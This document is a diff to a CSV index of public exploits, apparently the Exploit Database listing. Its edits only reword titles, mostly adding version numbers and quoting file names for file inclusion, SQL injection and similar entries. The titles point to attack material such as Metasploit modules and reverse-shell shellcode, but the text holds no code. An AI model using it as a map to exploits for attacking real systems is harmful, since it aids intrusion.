@@ -23209,7 +23209,7 @@ id,file,description,date,author,platform,type,port
 26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,php,webapps,0
 26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0
 26010,platforms/windows/dos/26010.py,"Quick TFTP Server 2.2 - Denial of Service",2013-06-07,npn,windows,dos,0
-26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,remote,80
+26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1 / 2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,remote,80
 26013,platforms/multiple/remote/26013.txt,"Oracle Forms 6i/9i/4.5.10/5.0/6.0.8/10g Services - Unauthorized Form Execution",2005-07-19,"Alexander Kornbrust",multiple,remote,0
 26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 - Processform.php3 Name Cross-Site Scripting",2005-07-19,rgod,php,webapps,0
 26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 - Processform.php3 Failed Cross-Site Scripting",2005-07-19,rgod,php,webapps,0
@@ -23325,7 +23325,7 @@ id,file,description,date,author,platform,type,port
 26122,platforms/php/webapps/26122.txt,"FunkBoard 0.66 - register.php Multiple Parameter Cross-Site Scripting",2005-08-08,rgod,php,webapps,0
 26123,platforms/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0
 26124,platforms/php/webapps/26124.txt,"WordPress Plugin WP-SendSms 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps,0
-26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c - (editor.php mapname Parameter) Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0
+26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c - 'mapname' Parameter Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0
 26126,platforms/php/webapps/26126.txt,"NanoBB 0.7 - Multiple Vulnerabilities",2013-06-11,"CWH Underground",php,webapps,0
 26127,platforms/php/webapps/26127.txt,"TriggerTG TClanPortal 3.0 - Multiple SQL Injections",2005-08-09,admin@batznet.com,php,webapps,0
 26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser - JavaScript Invalid Address Denial of Service",2005-08-09,"Patrick Webster",osx,dos,0
@@ -23455,7 +23455,7 @@ id,file,description,date,author,platform,type,port
 26254,platforms/php/webapps/26254.txt,"Land Down Under 800/801 - plug.php e Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0
 26255,platforms/php/webapps/26255.php,"Mail-it Now! Upload2Server 1.5 - Arbitrary File Upload",2005-09-13,rgod,php,webapps,0
 26256,platforms/cgi/webapps/26256.txt,"MIVA Merchant 5 - Merchant.MVC Cross-Site Scripting",2005-09-14,admin@hyperconx.com,cgi,webapps,0
-26257,platforms/php/webapps/26257.txt,"ATutor 1.5.1 - password_reminder.php SQL Injection",2005-09-14,rgod,php,webapps,0
+26257,platforms/php/webapps/26257.txt,"ATutor 1.5.1 - 'password_reminder.php' SQL Injection",2005-09-14,rgod,php,webapps,0
 26258,platforms/php/webapps/26258.txt,"ATutor 1.5.1 - Chat Logs Remote Information Disclosure",2005-09-14,rgod,php,webapps,0
 26259,platforms/php/webapps/26259.txt,"Noah's Classifieds 1.2/1.3 - 'index.php' SQL Injection",2005-09-14,trueend5,php,webapps,0
 26260,platforms/php/webapps/26260.txt,"TWiki TWikiUsers - Arbitrary Command Execution",2005-09-14,B4dP4nd4,php,webapps,0
@@ -23612,9 +23612,9 @@ id,file,description,date,author,platform,type,port
 26428,platforms/php/webapps/26428.html,"Search Enhanced Module 1.1/2.0 for PHP-Nuke - HTML Injection",2005-10-26,bhfh01,php,webapps,0
 26429,platforms/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - computers/default.asp Direction Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0
 26430,platforms/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - reports/default.asp Multiple Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0
-26431,platforms/php/webapps/26431.txt,"ATutor 1.x - forum.inc.php Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps,0
+26431,platforms/php/webapps/26431.txt,"ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps,0
-26432,platforms/php/webapps/26432.txt,"ATutor 1.x - body_header.inc.php section Parameter Local File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0
+26432,platforms/php/webapps/26432.txt,"ATutor 1.x - 'body_header.inc.php' section Parameter Local File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0
-26433,platforms/php/webapps/26433.txt,"ATutor 1.x - print.php section Parameter Remote File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0
+26433,platforms/php/webapps/26433.txt,"ATutor 1.x - 'print.php' section Parameter Remote File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0
 26434,platforms/php/webapps/26434.txt,"PBLang 4.65 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-27,abducter,php,webapps,0
 26435,platforms/asp/webapps/26435.txt,"ASP Fast Forum - error.asp Cross-Site Scripting",2005-10-27,syst3m_f4ult,asp,webapps,0
 26436,platforms/php/webapps/26436.txt,"MG2 0.5.1 - Authentication Bypass",2005-10-29,"Preben Nylokken",php,webapps,0
@@ -25296,10 +25296,10 @@ id,file,description,date,author,platform,type,port
 28273,platforms/php/webapps/28273.txt,"PHPSavant Savant2 - Stylesheet.php MosConfig_absolute_path Parameter Remote File Inclusion",2006-07-25,botan,php,webapps,0
 28174,platforms/php/webapps/28174.txt,"Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities",2013-09-09,"Ciaran McNally",php,webapps,0
 28175,platforms/linux/webapps/28175.txt,"Sophos Web Protection Appliance - Multiple Vulnerabilities",2013-09-09,"Core Security",linux,webapps,0
-28176,platforms/php/webapps/28176.txt,"ATutor 1.5.x - create_course.php Multiple Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
+28176,platforms/php/webapps/28176.txt,"ATutor 1.5.x - 'create_course.php' Multiple Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
-28177,platforms/php/webapps/28177.txt,"ATutor 1.5.x - documentation/admin/index.php Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
+28177,platforms/php/webapps/28177.txt,"ATutor 1.5.x - 'documentation/admin/index.php' Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
-28178,platforms/php/webapps/28178.txt,"ATutor 1.5.x - password_reminder.php forgot Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
+28178,platforms/php/webapps/28178.txt,"ATutor 1.5.x - 'password_reminder.php' forgot Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
-28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x - users/browse.php cat Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
+28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x - 'users/browse.php' cat Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
 28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x - admin/fix_content.php submit Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
 28181,platforms/linux/remote/28181.c,"AdPlug 2.0 - Multiple Remote File Buffer Overflow Vulnerabilities",2006-07-06,"Luigi Auriemma",linux,remote,0
 28182,platforms/multiple/dos/28182.java,"MICO Object Key 2.3.12 - Remote Denial of Service",2006-07-06,tuergeist,multiple,dos,0
@@ -26582,7 +26582,7 @@ id,file,description,date,author,platform,type,port
 30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 - search.php Cross-Site Scripting",2007-05-14,"Jesper Jurcenoks",php,webapps,0
 30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0
 30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow SEH Exploit (DEP Bypass with ROP)",2013-12-04,metacom,windows,local,0
-30085,platforms/linux/webapps/30085.txt,"Zimbra - Privilegie Escalation (via Local File Inclusion)",2013-12-06,rubina119,linux,webapps,0
+30085,platforms/linux/webapps/30085.txt,"Zimbra 2009-2013 - Local File Inclusion",2013-12-06,rubina119,linux,webapps,0
 30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injections",2007-05-14,"Jesper Jurcenoks",php,webapps,0
 30036,platforms/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 - Unspecified",2007-05-14,"David Kierznowski",php,webapps,0
 30037,platforms/windows/remote/30037.txt,"Caucho Resin 3.1 - Encoded Space Request Full Path Disclosure",2007-05-15,"Derek Abdine",windows,remote,0
@@ -27439,7 +27439,7 @@ id,file,description,date,author,platform,type,port
 30468,platforms/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local,0
 30470,platforms/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,5000
 30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution (Metasploit)",2013-12-24,Metasploit,linux,remote,80
-30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,remote,7071
+30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server 7.2.2 / 8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,remote,7071
 30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,8080
 30474,platforms/windows/remote/30474.rb,"Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)",2013-12-24,Metasploit,windows,remote,0
 30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80
@@ -29133,7 +29133,7 @@ id,file,description,date,author,platform,type,port
 32210,platforms/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 - BKBCopyD.exe Buffer Overflow (Metasploit)",2014-03-12,Metasploit,windows,remote,20111
 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - (Cross-Site Request Forgery/Blind SQL Injection) Multiple Vulnerabilities",2014-03-12,"TUNISIAN CYBER",php,webapps,80
 32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80
-32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - (browse.php file Parameter) Local File Inclusion",2014-03-12,Portcullis,php,webapps,80
+32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,php,webapps,80
 32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusion",2008-08-08,"Rohit Bansal",php,webapps,0
 32218,platforms/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting",2008-08-11,ahmadbaby,php,webapps,0
 32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x - visitor/index.php sessionid Parameter Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0
@@ -29367,11 +29367,11 @@ id,file,description,date,author,platform,type,port
 32501,platforms/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",multiple,local,0
 32502,platforms/php/webapps/32502.txt,"Getsimple CMS 3.3.1 - Persistent Cross-Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",php,webapps,0
 32503,platforms/php/webapps/32503.txt,"Cart Engine 3.0.0 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0
-32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 - (task.php) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0
+32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 - 'task.php' Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0
 32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps,0
 32506,platforms/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,php,webapps,0
 32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0
-32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 - (run Parameter) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0
+32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 - 'task.php' Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0
 32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps,0
 32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 - (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0
 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80
@@ -31317,7 +31317,7 @@ id,file,description,date,author,platform,type,port
 34666,platforms/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Root Code Execution",2014-09-15,eF,php,webapps,80
 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0
 34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",windows,remote,80
-34669,platforms/multiple/remote/34669.rb,"Railo - Remote File Inclusion (Metasploit)",2014-09-15,Metasploit,multiple,remote,80
+34669,platforms/multiple/remote/34669.rb,"Railo 4.2.1 - Remote File Inclusion (Metasploit)",2014-09-15,Metasploit,multiple,remote,80
 34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer - Arbitrary File Upload (Metasploit)",2014-09-15,Metasploit,multiple,remote,8400
 34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager - Authentication Bypass (Metasploit)",2014-09-15,Metasploit,java,remote,9000
 34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - Cross-Site Request Forgery",2014-09-15,"William Costa",linux,webapps,8090
@@ -31393,7 +31393,7 @@ id,file,description,date,author,platform,type,port
 34744,platforms/php/webapps/34744.txt,"YourFreeWorld Ultra Classifieds - listads.php Multiple Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0
 34745,platforms/php/webapps/34745.txt,"YourFreeWorld Ultra Classifieds - subclass.php cname Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0
 34746,platforms/php/webapps/34746.txt,"Web TV - 'chn' Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0
-34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 - 'file' Parameter Local File Inclusion",2014-09-23,Eolas_Gadai,php,webapps,0
+34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 - 'index.php' Local File Inclusion",2014-09-23,Eolas_Gadai,php,webapps,0
 40338,platforms/php/webapps/40338.txt,"PHPIPAM 1.2.1 - Multiple Vulnerabilities",2016-09-06,"Saeed reza Zamanian",php,webapps,80
 34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script - 'addlink.php' SQL Injection",2009-07-21,Moudi,php,webapps,0
 34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0
@@ -31408,7 +31408,7 @@ id,file,description,date,author,platform,type,port
 34760,platforms/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting",2014-09-24,"Kenneth F. Belva",php,webapps,80
 34761,platforms/php/webapps/34761.txt,"webEdition 6.3.8.0 (SVN-Revision: 6985) - Directory Traversal",2014-09-24,"High-Tech Bridge SA",php,webapps,80
 34762,platforms/php/webapps/34762.txt,"WordPress Plugin Login Widget With ShortCode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80
-34763,platforms/php/webapps/34763.txt,"OSClass 3.4.1 - (index.php file Parameter) Local File Inclusion",2014-09-25,Netsparker,php,webapps,80
+34763,platforms/php/webapps/34763.txt,"OSClass 3.4.1 - 'index.php' Local File Inclusion",2014-09-25,Netsparker,php,webapps,80
 34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80
 34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (Shellshock)",2014-09-25,"Stephane Chazelas",linux,remote,0
 34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection (Shellshock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80
@@ -31664,7 +31664,7 @@ id,file,description,date,author,platform,type,port
 35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 - 'faqlist.asp' SQL Injection",2010-12-04,R4dc0re,asp,webapps,0
 35050,platforms/php/webapps/35050.txt,"Alguest 1.1 - 'start' Parameter SQL Injection",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0
 35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server - Directory Traversal",2010-12-06,Pr0T3cT10n,windows,remote,0
-35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion",2014-10-25,"Parvinder Bhasin",php,webapps,0
+35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion",2014-10-25,"Parvinder Bhasin",php,webapps,0
 35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0
 35055,platforms/windows/remote/35055.py,"Microsoft Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0
 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0
@@ -32148,7 +32148,7 @@ id,file,description,date,author,platform,type,port
 35575,platforms/php/webapps/35575.txt,"PrestaShop 1.3.6 - 'cms.php' Remote File Inclusion",2011-04-08,KedAns-Dz,php,webapps,0
 35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 - 'arama_islem.asp' Cross-Site Scripting",2011-04-07,"kurdish hackers team",asp,webapps,0
 35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0
-35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - Remote Code Execution (via Local File Inclusion + SQL Injection)",2014-12-19,Wireghoul,php,webapps,0
+35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,php,webapps,0
 35579,platforms/php/webapps/35579.txt,"miniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80
 35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0 < 0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0
 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution (Metasploit)",2014-12-19,"Patrick Webster",linux,remote,6082
@@ -32158,7 +32158,7 @@ id,file,description,date,author,platform,type,port
 35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
 35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP connect Shellcode (77 to 85 bytes / 90 to 98 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
-35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,remote,9000
+35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,remote,9000
 35589,platforms/windows/dos/35589.py,"Notepad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,windows,dos,0
 35590,platforms/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 - Privilege Escalation",2014-12-23,LiquidWorm,windows,local,0
 35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - (browse.php category Parameter) SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80
@@ -32566,7 +32566,7 @@ id,file,description,date,author,platform,type,port
 36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80
 36026,platforms/php/webapps/36026.txt,"u5CMS 3.9.3 - (deletefile.php) Arbitrary File Deletion",2015-02-09,LiquidWorm,php,webapps,0
 36027,platforms/php/webapps/36027.txt,"u5CMS 3.9.3 - Multiple SQL Injections",2015-02-09,LiquidWorm,php,webapps,0
-36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - (thumb.php) Local File Inclusion",2015-02-09,LiquidWorm,php,webapps,0
+36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - 'thumb.php' Local File Inclusion",2015-02-09,LiquidWorm,php,webapps,0
 36029,platforms/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Persistent Cross-Site Scripting / Reflected Cross-Site Scripting Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
 36031,platforms/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",php,webapps,0
 36058,platforms/php/webapps/36058.txt,"WordPress Plugin Video Gallery 2.7.0 - SQL Injection",2015-02-12,"Claudio Viviani",php,webapps,0
@@ -34447,8 +34447,8 @@ id,file,description,date,author,platform,type,port
 38036,platforms/osx/local/38036.rb,"Apple Mac OSX Entitlements - 'Rootpipe' Privilege Escalation (Metasploit)",2015-08-31,Metasploit,osx,local,0
 38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 - Cross-Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0
 38038,platforms/multiple/dos/38038.txt,"Splunk 4.3.1 - Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0
-38039,platforms/php/webapps/38039.txt,"openSIS - 'modname' Parameter Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0
+38039,platforms/php/webapps/38039.txt,"openSIS 5.1 - 'ajax.php' Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0
-38040,platforms/php/webapps/38040.txt,"ATutor - 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0
+38040,platforms/php/webapps/38040.txt,"ATutor 2.1 - 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0
 38041,platforms/php/webapps/38041.txt,"WordPress Theme Madebymilk - 'id' Parameter SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0
 38042,platforms/php/webapps/38042.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter SQL Injection",2012-11-21,"High-Tech Bridge",php,webapps,0
 38043,platforms/php/webapps/38043.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter Cross-Site Scripting",2012-11-21,"High-Tech Bridge",php,webapps,0
@@ -34856,7 +34856,7 @@ id,file,description,date,author,platform,type,port
 38474,platforms/windows/local/38474.txt,"Microsoft Windows 10 - Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0
 38478,platforms/php/webapps/38478.txt,"Sosci Survey - Multiple Security Vulnerabilities",2013-04-17,"T. Lazauninkas",php,webapps,0
 38479,platforms/asp/webapps/38479.txt,"Matrix42 Service Store - 'default.aspx' Cross-Site Scripting",2013-03-06,43zsec,asp,webapps,0
-38480,platforms/php/webapps/38480.txt,"Fork CMS - 'file' Parameter Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps,0
+38480,platforms/php/webapps/38480.txt,"Fork CMS - 'js.php' Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps,0
 38481,platforms/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",hardware,remote,0
 38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Full Path Disclosure",2013-04-19,ITTIHACK,php,webapps,0
 38483,platforms/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0
@@ -34934,7 +34934,7 @@ id,file,description,date,author,platform,type,port
 38560,platforms/php/webapps/38560.txt,"Caucho Resin - '/resin-admin/' URI Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps,0
 38561,platforms/php/webapps/38561.txt,"Caucho Resin - 'index.php' logout Parameter Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps,0
 38562,platforms/php/webapps/38562.txt,"HP Insight Diagnostics - Remote Code Injection",2013-06-10,"Markus Wulftange",php,webapps,0
-38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics - Local File Inclusion",2013-06-10,"Markus Wulftange",php,webapps,0
+38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics 9.4.0.4710 - Local File Inclusion",2013-06-10,"Markus Wulftange",php,webapps,0
 38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash (PoC)",2015-10-29,"Luis Martínez",windows,dos,0
 38565,platforms/php/webapps/38565.txt,"Joomla! Component JNews (com_jnews) 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80
 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0
@@ -34991,7 +34991,7 @@ id,file,description,date,author,platform,type,port
 38618,platforms/windows/dos/38618.txt,"Python 3.3 < 3.5 product_setstate() Function - Out-of-Bounds Read",2015-11-03,"John Leitch",windows,dos,0
 38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0
 38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices - Multiple Security Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0
-38630,platforms/php/webapps/38630.html,"phpVibe - Information Disclosure / Remote File Inclusion",2013-07-06,indoushka,php,webapps,0
+38630,platforms/php/webapps/38630.html,"phpVibe 3.1 - Information Disclosure / Remote File Inclusion",2013-07-06,indoushka,php,webapps,0
 38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0
 38621,platforms/php/webapps/38621.txt,"WordPress Plugin Xorbin Digital Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0
 38622,platforms/linux/dos/38622.txt,"libvirt - 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",linux,dos,0
@@ -35059,7 +35059,7 @@ id,file,description,date,author,platform,type,port
 38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer - Cross-Site Scripting",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0
 38693,platforms/php/webapps/38693.txt,"Advanced Guestbook - 'addentry.php' Arbitrary File Upload",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0
 38694,platforms/windows/remote/38694.txt,"HTC Sync Manager - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-08-11,Iranian_Dark_Coders_Team,windows,remote,0
-38695,platforms/php/webapps/38695.txt,"CakePHP - AssetDispatcher Class Local File Inclusion",2013-08-13,"Takeshi Terada",php,webapps,0
+38695,platforms/php/webapps/38695.txt,"CakePHP 2.2.8 / 2.3.7 - AssetDispatcher Class Local File Inclusion",2013-08-13,"Takeshi Terada",php,webapps,0
 38696,platforms/asp/webapps/38696.txt,"DotNetNuke 6.1.x - Cross-Site Scripting",2013-08-13,"Sajjad Pourali",asp,webapps,0
 38697,platforms/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Parameter Local File Inclusion",2013-08-15,ICheer_No0M,php,webapps,0
